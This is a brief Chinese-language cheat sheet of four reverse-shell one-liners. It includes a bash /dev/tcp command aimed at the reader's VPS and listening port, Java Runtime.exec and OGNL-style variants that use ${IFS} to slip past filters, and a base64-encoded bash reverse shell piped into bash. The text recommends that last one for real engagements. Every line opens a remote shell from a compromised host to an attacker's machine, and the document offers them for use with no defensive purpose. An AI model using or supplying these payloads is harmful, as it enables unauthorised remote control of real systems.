通常1不能直接获取反弹Shell,实战中4很好用
1
bash -i >& /dev/tcp/你的vps ip/监听端口 0>&1 #大部分情况直接执行这个命令不能弹,用下面的
2
Runtime.getRuntime().exec("/bin/bash -c bash${IFS}-i${IFS}>&/dev/tcp/你的vps ip/监听端口<&1");
3
@java.lang.Runtime@getRuntime().exec('/bin/bash -c bash${IFS}-i${IFS}>&/dev/tcp/你的vps ip/监听端口<&1')
4
bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEyNy4wLjAuMS8xMjM0NSAwPiYx}|{base64,-d}|{bash,-i} #中间内容替换为1中的Base64